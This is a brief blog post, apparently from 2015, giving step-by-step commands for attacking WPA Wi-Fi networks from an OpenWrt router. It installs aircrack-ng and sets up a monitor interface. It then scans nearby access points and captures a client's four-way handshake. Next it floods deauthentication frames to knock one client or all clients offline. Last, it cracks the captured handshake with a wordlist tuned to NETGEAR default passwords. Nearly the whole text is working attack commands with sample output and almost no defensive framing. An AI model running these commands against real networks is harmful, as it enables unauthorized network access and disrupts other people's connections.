Pen Testing OpenWrt

Posted on February 1, 2015
Tags: hackhard 
opkg update
opkg install aircrack-ng
iw dev

iw phy phy0 info

iw phy phy0 interface add mon0 type monitor

ifconfig mon0 up
ifconfig mon0 down

iw dev mon0 del

1 Scan wifi ssid mac addr and channel

airodump-ng --ivs --write testcapture --beacons mon0
#this lists the routers nearby with their BSSID and Channel number which you need

2 Scan Device connected to wifi, write packets to file, capture EAPOL 4 way handshake

airodump-ng -c 12 --bssid 01:02:3E:4F:4E:8C -w psk mon0
#Most important step
#lists the devices(STATIONS) connected and writes out packets to a *.cap file
#captures the 4way handshake when EAPOL is seen on probe

# BSSID                 STATION             PWR     RATE        LOST        FRAMES      PROBE
# 00:00:00:00:00:04     02:01:01:01:01:02   -38     12e-24e     0           42          
# 00:00:00:00:00:04     03:01:01:01:01:01   -54     0e-1e       0           42          
# 00:00:00:00:00:04     01:01:01:01:01:01   -62     24e-24e     0           42          EAPOL <-- We found the 4way handshake, meaning you can Ctrl+C to stop this

3 Disconnect

aireplay-ng --deauth 0 -a 00:00:00:00:00:04 -c 02:01:01:01:01:02 mon0
#deauth SPECIFIC device on router

aireplay-ng --deauth 0 -a 00:00:00:00:00:04 mon0
#deauth ALL device on router

#use --ignore-negative-one if needed 
#aireplay-ng --deauth 0 -a 00:00:00:00:00:04 -c 02:01:01:01:01:02 --ignore-negative-one  mon0

4 Cracking the 4 way handshake

get a wordlist like Adj-Noun-Wordlist-Generator

cd Adj-Noun-Wordlist-Generator 
./adj | aircrack-ng -w - ~/psk-01.cap -e NETGEARXX
aircrack-ng -w somewordlist.txt ~/psk-01.cap -e NETGEARXX